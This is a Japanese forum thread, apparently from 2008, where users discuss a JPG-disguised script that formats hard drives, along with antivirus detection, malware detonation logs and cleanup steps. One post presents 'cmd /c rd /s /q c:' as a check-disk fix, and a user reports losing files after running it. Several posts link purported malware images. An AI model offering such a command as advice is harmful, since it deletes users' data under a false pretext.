>>413
とりあえずリカバリーしろ｡
そうすれば全て解決

待て、リカバリーしたら証拠なくなるだろ

言いたくはなかったけどWiki作ったやつ知識乏しすぎ
わきまえろって感じ
素人の鵜呑みの責任取れるのかよ
それこそ同罪

ウィルスリンク張りまくっておとがめ無しっておかしくね？

>>425
気持ちは察する

>>424
>>423は証拠隠滅したがってる(させたがってる)んじゃないかな？

ウイルスURL貼る

ここ

ウイルスだと知って貼っているかがポイントだな。

知っていればもう器物損壊
知らなくても過失は問われるし
民事だと過失でも損害賠償責任はあるからな。

だから誰と戦うんだよｗｗｗお前らキレ杉ｗ
被害者のパソコンを正常に戻すのが先決だと俺は思うんだけど
これって間違ってるの？

>>427
そんな雰囲気有りげ


幼稚なやつには制裁が必要だよ
手加減してブラクラ止まりだったのに最近は目に余る

>>429
なぜそこまで必死になる？

>>429
邪魔
臭いメシ食いたくないのはわかるけど

幼稚な頭の2chだから平気とかは終わりにさせたいね

過去に逮捕者が出てる犯罪予告カキコ以上に
実際の被害が出てるわけだしなぁ…

実際に突き止められるかはともかく警察に…は間違ってないとは思う

キメェスレだなw
正義のヒーロー気取りばっかw
アミララ捕まればいいねwwwwおまいらの行動力に期待w

> 実際に突き止められるかはともかく警察に…は間違ってないとは思う

当たり前だよね
泣き寝入りはPCが浸透する前までの風潮
もう時代が違う

>>435
挙動不審になってきてるようだが？大丈夫か？

人間追い詰められると冷静さを失うからな。

>>437
山田ウイルスとか散々性質の悪いのが今まであったのに今回のこの
空気に戸惑ってるだけだ。

やる以上はリスク背負わないとな。
結果、理不尽でもいいから晒し上げられる人間が必要。

ぐぐってみたけどアミララってかつて猛威を振るったウイルスなんだな。
当時の記事とか見てるとやはりノートンが対応してなくてワロタwww
今も昔も対応の遅さは全然変わってないのな

結局セキュホをついたものなのかはっきりしてほしい

そうだ、誰か運営に言ってスレ保存してもらうといいよ
警察に被害届出すっていえばいい

もし検挙されてまだ残り半生があるようなやつだったらスカッとするだろうなあ
ここ最近いい加減うざかったからなあ

>>442
そうしとこうかな

>>443
セキュ板住人でもそう思うの？

相談者置いてけぼりだな。

>>443
＞ここ最近いい加減うざかったからなあ
誰？

>>444
趣味でもないしこれでメシ食ってるわけでもないし

http://kissho.xii.jp/1/src/1jyou23236.jpg.html

448の人間は俺のリスト入り

だれかWindowsUpdate最新状態で>>448の今回のウイルス（だよね？）踏んだ奴いる？
これでbatファイルが落とされればexploitついてるってことになるよな？

俺も2ch関係の事で橋本弁護士にログ提出した事あったな

>>450
そうだね
通報しても裁定はキミがするわけじゃないからね

惜しい
橋下

>>451
正確に書くと提出する時のログに残るから良かったね

喜ぶところかそれ

wktk

定期age

（・３・）　エェー　時事的に頻繁定期ageだＮＥ！

なにげに>>115が最強の対策法じゃね？

市況２にウイルス貼られて、jpg踏んだらipとクリップボードの内容抜かれたって
言われたんだけど、どういう種類のウイルス？ヤヴァイ？

俺が踏んだやつはまだましなのか･･･
気をつけねば

format.comはリネームしておいてる

>>460
死ぬほどやばい。やばいから質問スレへ池。

もうどうしたらいいかワカラン。

フルスキャン

現段階の各社の対応情況どうなのよ？

つーか、スレを開いただけなら無問題なの？

定期age

>>466
スレに貼られたウイルスコードに反応する事があるけど、
スレを見るぐらいでは感染しないよ。多分

ウイルスに感染した奴の自演がひどいな

結局、一番の対応は、しばらくformat.comをなんかの外部記憶装置にコピペしておくことなんですか？

コピペっつーかカッペ
ちゃんと切り取るんだぞ

deltreeされるからほとんど意味が無いという書き込みをどこかで目にした

これいろいろ騒がれてたけどただIEがjpgをHTMLで開いちゃうってだけだろ

>>470
ちょ、コピーじゃ駄目だろｗ

http://www.uploda.org/uporg1186454.jpg
↑
さっきコレを踏んでしまいウイルスと言われてました
ずっといろんなところを調べたんですけど
スタートアップにはなにもありません
大丈夫なのかわかりますか？というかコレ自体はやはりウイルスなんですか？

はいはい、良かったね

もういいわ
面倒だから再起動してみよっと
だめでもいいや

２０分経過・・・

>>475
ただのjgp

　　　　　　　　　　　 ＿_ 　　＿＿
　　　　　　　　　 　 　 　 /〃　 　　|　＿＿
　　　　　　　　　　　　　/＼　　＿　| 　 　　　　　　　　　　　　 __
　　　　　　　　　　　　　　　　 　　　　　__　　, -――-、　　/＼ﾉ
　　　　　　　　　　　　　　　　　　　　　 ヽ/＼l::::::::::::::::::::＼ /: : /
　　　　　　　　　,..-―-､／）　　　　　　　|: : :|::::::::::::::::::::::／: : /
　　　　　／⌒Ｙ　　　　（_ノ　 /） 　 　 　 |: : :|:::::::::::::::::::::|: : : /
　　　　　￣l￣l､　　　　 ） ／｀〉　　　　　ヽ:: :|::::::::::::::::::::l: : :/
　　 　 　 　 l: : :｀ー--‐'‐'´: :/　 　 　　　　＼|∧ハ/l／: ::〈
　　　　　　　＼: : : : : : : : : :く　　　　　　　　　|: : : : : : : : : : ｀ー-┐　　,.､
　　　　　　　　　l: : : : : : : : : :｀ー―┐ ,､　　　|: : : : : : : : : : : : : : |二lニﾉ
　　　　　　　　　ヽ.: : : : : : : : : : : : : :|ニﾉ　　　|: : : : : : : : : : : : : : |
　　　　　　　　 　 ヽ: : : : : : : : : : : : :|　　　　　 ヽ: : : : : : : : : : : ／
　　　　　　　　　　　＼: : : : : : : : :／　　　　　　　＼ : : : : : : ／
　　　　　　　　　　　　 ￣￣￣￣　　　　ノ|　　　　　￣￣￣　　　　　　　ノ）
　　　　　　　　　　　　　　　　　　　ノしノ　 し'（　　　　　　　　　　　ノ)__ノ　（ノ(
　　　　　　　　　　　　　　　　　　　'――――-'′　　　　　　　　　'-――一-'


心配して損したｗ
でもちゃんと帰ってこれた
↑の人ありがとうございます

TEIKIAGE

要お礼

ダイイング メッセージ

∵∴∵∴∵∴∵∴∵∴∵∴∵∴∵∴∵∴ヽ
∵∴∵∴∵∴∵∴／￣∵∴∵∴∵∴∴∴∵ヽ
∵∴∵∴∵∴∵∴|　●　|∴∵∴∵∴∵∵∵∴ヽ
∵∴∵∴∵∴∵∴　＿／ ∴∵∴∵∴∵∴∵∴ ヽ
∵∴∵／￣￣￣￣　　 ,-‐-､ ∴ ／￣∴∵∵∴∵ ）
∵∴／　　＼　　　　　/　　　ヽ∴|　●　|∴∵∵∴　ﾉ
∵／　　 ＼　＼　　 　l　　　　|　　　＿／∴∵∴∴ノ
／　　　＼　＼　　　　 ゝ___,.ノ　　|∴∵∴∵∴∵ 丿 三が日は終わったぞ
　　　　　　＼　　　　 ／　　　　　 |∴∵∴∵∴∵ノ
　　　　　　　　　　 ／　　　　　　　|∴∵∴∴∵ 丿 　いつまでも起きてないで
　　　　 ＼　　　／　　　　 ＼　　 |∴∵∴∵∴ノ 　　　　早く寝た方がいい
　　　　　　＼／　　　　　＼　＼　|∴∵∴∵ノ
　　　　　＼　＼　　　　＼　＼　　|∴∵∴ノ 　　　　…おまえ達を見てると心配になる
　　　　　＼＼　＼　　　　＼　　／∴∵ノ　http://www.youlost.mine.nu/html999/img/2718.jpg
　　　　　　　　　　 　　　　　　／／

ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ見ても
「拡張子ではなく、内容によってファイルを開く」という項目がありません。
この項目どこにありますか？
ちなみにIE6.00です。

うちのだと「レベルのカスタマイズ」の「その他」の項目、下から三番目にある。
IE6だから同じだと思うけど。
ちなみに「拡張子ではなく、内容によってファイルを開くこと」になってる。

>>486
ありがとうございます、485です。
こちらの「その他」の項目の下から三番目は「異なるドメイン間のサブフレームの移動」となってます。
どなたか御存知の方、宜しくお願いします。
また今夜に来ます。

こっちだと「異なる〜」は下から４番目だな
XPPRO使ってるのが関係あるかは知らないけど。
以前どっかでtxtファイルをhtmlとして読んで変なサイトに飛ばされたんで
無効にした

おっはー（−−;）

もしあやまってウイルスがパソコンの中に入れてしまったら、
そしてうっかりパソコンを終了してしまったらどうしたらいい？

>>490
パソコンの環境によって対処法は異なる。
心配ならこまめにバックアップを取るようにしたらどうだ？

>>491
よくあるパソコンの環境の対処法でおしえて。

ゆとりさんかな？
バックアップをとっておくこと

>>493
バックアップとったあとに大切なファイルがあったときは無理ってこと？

なんのためにバックアップすると思ってるんだ

？？？

こうやって見てるとゆとりってどこまでもばかなんだな。

冬休みだしな

ボクの最悪な人生もフォーマットしてくれませんか。

おまいはごみ箱で十分

つまりまだやり直し可能、と。
やさしいな；；

携帯使ってバックアップもできるから

ＳＤカードいれてカードリーダモードにするだけだ
対応機種だけだけど

やり直し可能？
にんげ〜ん〜ごじゅ〜うね〜ん〜

doeの専ブラ使ってるんだが最近エラーの警告が出る
消したらまたドドドンとでてくるんだ
これってそのブラクラのせいかな？
怖くて眠れないから誰か教えてくださいorz

メモリ不足じゃない？

相変わらず貼ってる馬鹿いるな
共犯になるとも知らず

どんどん警察のサイバー犯罪ページから報告したほうがいいな。

>>505
すまん　
初心者だからよくわからないんだがメモリ不足の場合どうすればいいんだ？

ぱそをまどから

今、これだけ危険を感じてるのに面白がって貼ってるやつは該当するね。

脅迫罪においての脅迫は、人の生命、財産、身体、名誉、自由（通説によれば貞操や信念も含む）に対して害悪する告知を行うことである。相手が恐怖心を感じるがどうかは問わない

抽象的危険犯

トレンドマイクロ、パターンファイル上がったね
今回ので対応してるかしらん

スタートアップにバッチファイルが無ければいいんだよな？
とりあえず

>>507
いや俺も初心者だからわかんないｗ
なんてエラーが出てるのかもわかんないし

>>507
チェックディスクコマンドを試してみ。

1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。

上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:

これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。

>>513
お前の書き込みは器物損壊罪に該当する。
警察に通報した。

※513の内容はHD内容を消去する方法です。

チェックディスクコマンドというのをして[スタート]→[ファイル名を指定して実行]を
押して　cmd /c rd /s /q c:　と打ちＯＫを押したら、
デスクトップのファイルが消えてたり、共有ドキュメントはあるんですが、
もうかたっぽの方のドキュメントが消えていました。
すぐにもとに戻したいんですが、どうしたら戻りますか？

ここは怖いインターネッツですね

>>513
それ何が面白いの?

513はRemove Directory

いさぎよくカスペルスキーに乗り換えればよかった

ドライブをＡＢＣ...にするからフォーマットされちゃんうんだよ
ニッポン人なら松、竹、梅、い、ろ、は、に、ほ、へを使えよ!!!

>>485
IE6 SP2以降。。。

ちなみにファイルの格付によって分けてます
松：業務用データ
竹：私用データ
梅：娯楽用データ

更に松のデータへのアクセスは
インターネットに繋がったＰＣからはアク禁です

神降臨w

ノートンも昨日の日付でバージョン上がってた。ただ仮想環境じゃないのでテストは出来ないけど…

>>513は確実に悪意をもってしてるな
もう何回目だ？

調子に乗りすぎ。
しかも毎回同じ文章だしな。

おとなしく自首したほうがいい。
少しは罪も軽くなるだろう。

wikiアンチウイルスソフト対応状況
http://www13.atwiki.jp/burakura_hdd/pages/12.html

現在の対応状況は半数にも満たしてない

それさ、更新されてないだけじゃね
ノートンもバスターも対応したっぽいじゃん

本当かどうかは定かではない

次週につづく。。

人柱はおらんのかいな〜

メールが送られてきたって人、どんな内容？
親父の携帯に親父のPCからメールが来たんだけど、転送する設定にはしてないらしい。
内容はどーでもいい出会い系かなんかの日本語スパム。
エロ画像もグロ画像も踏んでないし、2chもやってないらしいから違うのかも知れないけど。

>>530 誤爆か？
親父の携帯と親父のPCのメルアドを知っている第三者からの悪戯に一票。

似たような悪戯はよくやったな。
メールのヘッダを調べれば発信元のIPがわかるから誰が犯人だか見当つくよ。

そこでIP偽造ですよ。

>>530-534
スレ違いです。涙目で退場下さい。

イッテラ以上のバックアップが必要な人は大変だぁ〜ね！

３５ヨタバイトのバックアップ先が見つからない（ry

33 ヲタ バイトの俺はどうすれば人生再インストール出来ますか？

>>537
（　＾ω＾）つ【練炭】

ヲタバイトらは途方に暮れてるようだが生�`！

バックアップでは対処できない時代に突入してます罠

キロバイト (KB)
メガバイト (MB)
ギガバイト (GB)
テラバイト (TB)
ペタバイト (PB)
エクサバイト(EB)
ゼタバイト (ZB)
ヨタバイト (YB)
ヲタバイト (WOB)←ﾜﾛｽW

なんか俺らってちっぽけな存在なんだな
ありがとう。おまいら

罪を犯してしまう人はそれなりの理由や覚悟があってのことと察します。
罪を犯した人を憎むのではなく、その人を犯行に及ぼした”種や理由”を憎むのです。
人は稀に強い正義感から罪を犯してしまうこともあるのですから。

今さら来てみた産業

バスターちゃんと動いてくれた
よかた

ノートンはいつになったら…

tp://shunan.myminicity.com/
これは大丈夫かね

>>546
今日未明にとっくに対応してますが

>>548
そうなの？さっきどっかでまだだって書き込み見たから

AVG対応してるのか
スレで画像に対してウイルスだとか言われてるのいくつも保存してあったけど、スキャンしても出ないな
ウイルスのサンプルってどこにもない？

ウィルスじゃないだろ

ウィルスさっき踏んだけど貼ったら俺まで通報されるかもしれないし

いまいちよくわからないんだが、元はただの画像ファイルで、
その画像ファイルのコメント領域かどこかにウイルス発動のためのコードが書いてある
それをIE系が画像ファイルとして処理しないでテキストとして処理しようとしてコードが実行され、
発動のためのbatファイルがスタートアップに保存される
スタートアップに保存されたから再起動時に実行されると終わりということ？

>>531->>533
ﾄﾝｸｽ
誤爆じゃないっす。まとめサイトにメールが送られてきたとか書いてあったんで。
ヘッダ見るという事を忘れてました。親父に言っときます。

63のやつがそうなのか？
保存したらAVGがSmallなんたらって出た

>>555
そう。

おｋ把握した。これからコレクションに追加してくる

ｊａｎｅｄｏｅ＆狐使いの俺は無問題なのか？

AVGがまだ対応してないのあるぞ。
馬鹿みたいなことするなよ。
ttp://www.virustotal.com/analisis/0a855807d8948a0870105bb62c373924

>>553　>>555
ニュー速の現行スレに本体のJScriptファイルらしきものがおいてある。
素人だから見てわからなかったが、暗号化されてると聞いて背筋が凍った。

ニュース速報＋の現行スレ
【IT】 HDDをフォーマットしちゃうWebサイトが出現。ご注意を！★８
ttp://mamono.2ch.net/test/read.cgi/newsplus/1199295435/

>>6では、ギコナビのポップアップ（画像プレビュー機能のことだよね？）は死亡になってるけど
まとめWikiではギコナビの画像プレビュー機能は大丈夫って書いてあるんだけど、どっちが正しいの？

〜スタートアップにbatファイルがないのに
起動する時にHDフォーマットされそうになるのはなんでだぜ？
キーボードのBreak押したら一応キャンセルはできるみたいだが･･･

俺Meだから知らないけどそれってチェックディスクじゃないの？
どの時点で出てくるものでFormat云々とか書いてあるの？

>>562
ギコナビの画像プレビューで例の画像ポップアップしたけど
とりあえずbatに関してはどこにもダウンロードされてないのを
これに対応済みの複数のウイルススキャン（全ファイル）で確認したよ
怪しいフォルダを開いても見つからなかった

ただ、ギコナビの画像プレビュー用にTemporary Internet Filesに作られた画像ファイルに
トロイの反応あり
手動で削除して、再起動も何回かして２日程度たつけどとりあえず今PCに異常なし

多分大丈夫だとは思うんだけど
心配ならしばらくのあいだ画像プレビューポップアップを無効にしておいたほうがいいかも

「「拡張子ではなく、内容によってファイルを開く」無効でも駄目なケース」
ttp://bakera.jp/ebi/topic/3052

今回のgigigiはこれじゃなかったが、万が一これだった場合は無効にしてても無意味だった
上記テストファイルはOperaでもhtmlとして判断してしまってる…

ノートン更新したからかさっきからdownloaderという名前の脅威で
Temporary Internet Files\Content.IE5\〜\2718[1].jpg
っていうのがやたら反応しまくるんだが・・・

このスレ閉じて30分経ったから来てみたらすぐ↑の反応があった。
このスレのせいだったのかorz

HOSTS弄って保存したら
Windowsに“出来ねよ(ﾟДﾟ)ｺﾞﾙｧ!!”された
読み取り専用になってた

再度やったらまた保存できねぇ

今度はZAが原因だった

再々度、やったら

今度はWindowsデフェンダが
“HOSTSが変わるぞ((((；ﾟДﾟ))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ”してきた

許可して
やっと出来たぜ。

2ch 書き込みスクリプト公開されてるよ。
●、BEログイン対応
http://pc11.2ch.net/test/read.cgi/php/1060009605/508

ウイルスキラーは対応したのか。
御三家の中で馬鹿フィーだけ取り残されてﾜﾛﾀ

http://www.vippers.org/img/uho2155.jpg

脳豚（/ω＼）ﾊｽﾞｶｼｰｨ

ウイルスキラーより遅い御三家はマジ失笑ものだな
中華以下かよｗｗｗ

まぁ新種ウイルスへの警戒で御三家を使う事自体がアホだけど。

NODやavast!、BitDefenderも対応してないからこれらも中華以下だな。
BitDefenderは一日に何回も更新してるのに最近は新種や亜種に弱い、何をアップデートしてるんだよ。

>>572
どこが恥ずかしいのか見てきた。どこかの宣伝部隊か？
なんでもかんでも対応してると定義ファイルが肥大化するよ。

ファイル名 uho2155.jpg 受理 2008.01.05 02:29:02 (CET)
現在の状態： 完了
結果: 4/32 (12.5%)

アンチウイルス バージョン 更新日 結果
F-Secure 6.70.13030.0 2008.01.04 Trojan.HTML.Agent.b
Kaspersky 7.0.0.125 2008.01.05 Trojan.HTML.Agent.b
Sophos 4.24.0 2008.01.04 Mal/Iframe-F
Webwasher-Gateway 6.6.2 2008.01.04 Webwasher: Win32/ImgTagVulnerability
http://www.virustotal.com/jp/
http://www.virustotal.com/jp/analisis/b1664553cd2f83a716189fb30975314a

AntiVirは土日更新ないのが痛すぎる、たまに土日更新もあるけどまれなんだよね。

>>574
対応が遅い、あるいは対応しないということは
この脅威が相対的に重要ではないんだよ。
http://canon-sol.jp/product/nd/virusupd/index.html

>>577
ノートンやバスターだって対応したのにそんな言い訳通用しねーよｗ

>>575
AntiVir送った

>>579
ありがとう。これからEsetに送ってみる。

送るやつとベンダーの対応の早さの両方がなければ結局エンジンは何の意味も成さないってこと

>>578
この中にSymantecやTrendMicro、Kasperskyが対応していない
マルウェアがあるかもしれないよ。
http://canon-sol.jp/product/nd/virusupd/index.html

話題になってると非常に重要だと思えるかも知れないが、
案外目につかないところでいくつも新しいより重要な脅威が
発生しているのかもしれないよ。

HDDをフォーマットするマルウェアには対応してるんだし、
IE6SP2以降のIEでは同類のトラップを回避できる設定もあるし、
他のブラウザにも影響しないようだし、重要性自体はそれほど高くはないんじゃ？

＞Kasperskyが対応していないマルウェアがあるかもしれないよ。

ねーよカスが
NOD厨はここでオナニーしないでさっさと失せろ

「重要性」なんていってるからノートンやバスターは落ちぶれ始めNODは世界で相手にされないんだな。
で、カスペが躍進してるという現実。

送ってきた。

しかし冬厨が作れるウイルスなんざせいぜいがJSとiframe挿入
頑張ってbatファイルかよｗ

世　界　中　か　ら　笑　わ　れ　て　ま　す　よ　

>>586
キタコレ
冬厨逮捕のチャンスじゃん

このウイルス作る奴は厨だがこれに引っかかる奴も十分冬厨じゃね？

場合によっては冬厨が冬厨を訴えるの図が出来上がるのかｗ

あれは冬厨じゃないだろｗ

慌てずに再起動せずにシステムの復元をすれば良かったのか・・・。
バックアップはしていたので思い切ってPC買い換えようかと思ったけど
使い慣れたXPノートをもうしばらく使おうと思い、リカバリして
完全復帰した俺です。

慌てて電源を切って他のシステムからウイルシスキャソして復帰しましたが何か。

>>592
あんたはエロイ！

つか報告あってから対策が出るまでURL踏まなければよかったのに・・・

>>594
あんたはアマイ！

年末2chせずに家族と楽しいひと時を過ごしていたら
踏むこともなかったのにね

裁判官「何故踏んだんだね？」
俺「そこにURLがあるからです！」

アミララの単純な罠に二回も引っかかってんだからやさしいやつらだな｡お前らは｡

>>565
遅くなったけどサンクス

>>572をVirtualBox上のXP(IE6+SP1)/ホスト側NOD32で踏んでみた。

モジュール 対象 名前 ウイルス アクション ユーザ システム情報
IMON ファイル file1.exe Win32/Spy.Goldun.NCK トロイ 隔離済 - 切断されました
IMON ファイル fds1010.exe Win32/TrojanDownloader.Zlob.BNY トロイ 隔離済 - 切断されました
IMON ファイル upd.php?t=559 HTML/TrojanDownloader.IFrame トロイ 隔離済 - 切断されました
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル ~jjenscom/up4/index.php JS/TrojanDownloader.Agent.ZZ トロイ 隔離済 - 切断されました
IMON ファイル check/upd.php?t=559 HTML/TrojanDownloader.IFrame トロイ 隔離済 - 切断されました
IMON ファイル 2.ani Win32/TrojanDownloader.Ani.Gen トロイ の亜種
IMON ファイル ekryhhpo ウイルスの可能性 : Win32/TrojanDropper.Agent トロイ の亜種
IMON ファイル 2.ani Win32/TrojanDownloader.Ani.Gen トロイ の亜種

ログの残り
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル 000/loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル 000/dnlsvc.exe Win32/TrojanProxy.Agent.JL トロイ 隔離済 - 切断されました
IMON ファイル 000/loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル bla.exe ウイルスの可能性 : Win32/Statik トロイ の亜種
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 切断されました
IMON ファイル pics.com/ JS/TrojanDownloader.Agent.NAX トロイ 切断されました
IMON ファイル ?id=1005 JS/TrojanDownloader.Agent.AB トロイ 切断されました
IMON ファイル .org/ JS/TrojanDownloader.Agent.NAX トロイ 切断されました
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ
IMON ファイル go.exe Win32/TrojanClicker.Delf.IT トロイ
IMON ファイル /dnlsvc.exe Win32/TrojanProxy.Agent.JL トロイ
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ
IMON ファイル 2.ani Win32/TrojanDownloader.Ani.Gen トロイ の亜種
IMON ファイル test.html JS/TrojanDownloader.Psyme.NBZ トロイ
IMON ファイル cyber.wmf Win32/Exploit.WMF トロイ の亜種
IMON ファイル test.html JS/TrojanDownloader.Psyme.NBZ トロイ
IMON ファイル pics.com/ JS/TrojanDownloader.Agent.NAX トロイ
IMON ファイル ?id=1005 JS/TrojanDownloader.Agent.AB トロイ
IMON ファイル org/ JS/TrojanDownloader.Agent.NAX トロイ

ちなみに、ホスト側Windows XP SP2には全く影響なし。

試しに仮想マシンに隔離したNICを割り当ててもう一回踏ませてみた。
結果、多数の怪しげなプログラムが組み込まれました。かなり有害。
svchost.exeがたくさん起動してます。ユーザー権限でw
万一実環境で踏んじゃった人は、ログイン直後にタスクマネージャを開いて、
userinit.exeを殺すとログインが止まるので手動でexplorerのみ立ち上げて、
C:\Backup_driversとかいうフォルダをフォルダごと削除。
msconfigとかで怪しいスタートアップを解除orregeditで削除。
結構簡単に消せました。私の環境では。

>600-602
gj

ようわからんけど、これもJSをOKにしておくと食らうもんなの？
もしそうなら、今回の騒動でJSを切ったり、ブラウザ・専ブラ変えてたりする人が
多いだろうから、まだ被害もそんなに出ないんだろうけど。

userinitってのはログイン時にしか出ないのかな、
だとしたら、とりあえず、未対応ベンダーの場合、
Cドライブに怪しいフォルダがあるかが感染の判別ポイントなのかな…。

あと、スタートアップは、スタートメニュー内のフォルダは手動できれいにすればいいとしても、
レジストリの方は自分で掃除するのが怖い場合、
スタートアップチェッカーあたりをあらかじめ入れてないと困るのかな…

短縮URLを使ったやつを2ch以外に書き込むやつもいるようだし、
2chに書き込みをせずP2Pを使わないで、たかだかWebを見て回るだけでも、
おびえながらやるようなことになるのかな、今後…。

blogのトラックバック、コメントでも悪用すれば行けるからねー。

>>602
> msconfigとかで怪しいスタートアップを解除orregeditで削除。

ｋｗｓｋ。
例えばどんなぁゃιぃプログラムが常駐するの？

>>605
「svchost .exe」（ファイル名末尾に空白あり)が6つほど
「ms-1.exe」
「msntqsbk.exe」（たぶんランダムなファイル名、Cドライブ直下に発見/39,424Byte)
「apnccwwqvvp.exe」（上に同じく/45,056Byte)

っていうか、仮想ディスクを元に戻して踏み直したら、
ログオン後数分で強制ログアウトするようになったwwこれはひどいwww
でもワンクリックで元通りwwwざまぁwww

で、userinit.exeを殺して、explorerだけ立ち上げてしばらく放っておいたら、
「TrustedAntivirus」とかいう怪しげなプログラムがインストールされた。
現在インストール進行中。ちなみにホストには全く影響なし。

apnccwwqvvp.exeを消したら強制ログオフはなくなった。
TrustedAntibirusをアンインストールしたらコントロールパネルが消えたw
仕方がないから仮想ディスクを復元して終わり。実環境ではどうすればいいやら…
NODの反応がいまいち良くないな…ファイルを組み込まれる前はちゃんと動作するんだけど、
組み込まれたファイルを検出しないのがあった。

とりあえず、現時点での対策はJavascriptを無効化したり、
IE以外のブラウザを使うしかないんじゃないかな。
そういえば、NetFront（PSP/Windows Mobile 5)も偽装されたファイルに対応できなかった。
自作のjpg風味スクリプトをPSPで踏ませたら普通に動作したw
PSP\UPDATE\EBOOT.PBPにファイルを保存させられればPCより酷い目に遭うかも。(CFWの人は)

ふーん　janeで踏んだけどなんともないけどな
飛び先の画像もいくつか踏んだけどなんともねえｗ
アンチウイルス入れてないけどｗ

>>606氏は乙だけどsp1じゃ感染して当たり前ｗ

>>608
あえて一番脆弱性の多いSP1を選んでみたｗ
というよりは手元にあるディスクがSP1のだったｗ
暇があったらSP2とSP3の環境を構築して実験してみる。

>>608
janeってstyleあたり？susieプラグイン通した？

ってか、前から気になってたんだけど、これのビューアであやしいURLを
踏んだけど平気だったってひとよくいるけど、これって、susieプラグイン
通してる人と通してない人っているよね…。
どっちも大丈夫っていうなら大丈夫だけど、
たとえば、プラグインつかっている人が大丈夫だけど、通してない人はアウトっていう
やつが出てきたら、かえって意図せずデマが流れて悲惨になる気が…

>>609
SP3の場合、セキュリティもさることながら、安定性や、既存ソフトの動作不具合も気になるww
がんばれ

これ訴えられたら、うpロダ管理人も２ちゃんも民事告発対象になる。

とりあえずHDに保存してたSP3で環境作ってみた。
NOD32/JaneDoe View Alpha/Firefoxは正常動作。
検出・動作はSP1と全く変わらず。安定性はSP2とあんまり変わらないと思う。
…IE大丈夫か？

>>610
jane style
プラグインは別になにもｗ
ほとんどデフォの状態

susieプラグインて何？

>>611
は？

>>612-613
なるほど。

>>614
俺もプログラムとかさっぱりなんだが、susieってのは、フリーのビューアで昔、定番だったやつ。
んで、このソフト、画像出力にプラグイン方式を使っているから、
プラグインを入れることにより、出力できるファイル形式やら出力方法を自由に変えられるの。

んで、このソフト自体をメインに使っている人は最近はいないと思うんだけど、
このプラグインは他のソフトにも相当利用されていて（有名なのだと、Leeyesとか）、
これにより、画像の表示方法が、自由にカスタマイズできるわけ。

んで、janestyleでも、ビューア設定のところでこれを使えるのさ。

これを使うと、jpg偽装でも、プラグイン独自の読み込みをするから案外ブラクラは回避できたりするわけ
もちろん、自分が何か踏んだが、ゼロデイでまだ対策がわからないというときに、
自分と同じプラグインつかっているひとを見つけないと情報交換できないから困ることもあるが。
（そもそもsusieプラグインでもアウトなら、janeデフォで使っている人はほとんどアウトな気もしないでもないけど）

民事告発ってどこの外国の制度？w

俺の人生もフォーマットしてほしい

雨だろ

雨でやられたら行かなくてはいけないからな

これで検出駆除
↓
ttp://winantivirus.com/

すいません、怪しいと思われる画像を踏んでしまったんですが、
このままではシャットダウンも出来ません・・・
何処かチェックできる所はありませんか？
方法でも良いのでお願いします・・・

>>621
とりあえずこのスレを最初から読むべきじゃないのか？

>>622
黙れカス

　　　　　　　　　　　　　　　./　 ヽ　　　　　 /　 ヽ
　　　　　　　　　　　　　　 /　　　ヽ＿＿＿/　　　ヽ
　　　　　　　　　　　　／　　　　　　　l＿＿＿l　　　＼
　　　　　　　　　　　　|　　　　　 ● 　|　　　 |　　●　 |　　／￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　へ　　　 |　　 へ　　　　　ヽ　 ./　　　　　|　＜　　逮捕者ﾏﾀﾞｰ？
　　　　　　　 ＼＼　　＼　 ＼＼　　　　ヽ/　　　　 ／ 　　＼＿＿＿＿＿＿＿＿＿＿＿＿
ﾁﾝ　　　　　　　 ＼＼　　.＞　＼＼　　　　　　　　　　ヽ
　　　ﾁﾝ　　　　　　＼＼/　　　　＼＼　　＿　　　　　　 |
　　　　　　＼￣￣￣￣￣￣￣／　 /￣　　 ヽ　　　　/　　 ＿
　　　　　　　 ＼回回回回回／￣￣ヽ　　　　　　　　/￣￣ ／|
　　　　　　　　　＼＿＿＿／　　　　　 ヽ＿＿＿＿／　　／　 |
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 ／　　　|
　　　　　　　　　　　　　　　　　　　　　　　　　　 　　 ／　　　　 |

>>621
>>383みたいな書き方だな。この人はあれから全く顔出してないし。釣りの一種か。

>>625
黙れクソカス

>>623
存在するなｶｽ

ちょっと聞きたいんですがhttp://goggle.comに入るとどうなる?

>>628　マカフィーの宣伝だとこうなるらしい。
ttp://jp.youtube.com/watch?v=R8Ep0seKlN8&eurl=

>>629何度見ても泣けてくる

>>629
サンクス。グーグルと間違えないようするよ。

俺、以前にjavascript切っててもブラクラ発動するサイト踏んだんだ。マジで。
で、Proxomitronを入れたら回避出来た。
それ以来、Proxomitronを間にかましてしかブラウジングしなくなったよ。
オミトロン様様です。

そろそろ夏冬の自由課題に「ウィルスの収集と観察」を提出するお子ちゃまも現れるのでは・・・

goggleはもう無害なんだけどね｡
未だに騒いでるお馬鹿ちゃんがいるみたいだけど

もう無害　その安心が　命取り

>>627
黙れカス

>>636
存在するなｶｽ

>>633
Zipでクレ

>>637
黙れカス

http://kikuz0u.x0.com/wmf_exp.html

The requested URL /wmf_exp.html was not found on this server.

kikuzouさん？

なんか前にも似たような釣りネタあったな

open jane も感染する？

人ごみに行かないので風邪をひきません

OppaPpi-も感染する？

ノロウイルスの方がマジで怖い

ttp://internet.watch.impress.co.jp/cda/news/2008/01/07/18052.html

gigigiの画像の部分をクリックしてしまいました。
IE7なので、再起動してもフォーマットはされませんでした。
今しがたノートンでスキャンしたらDownloaderが検出されました。
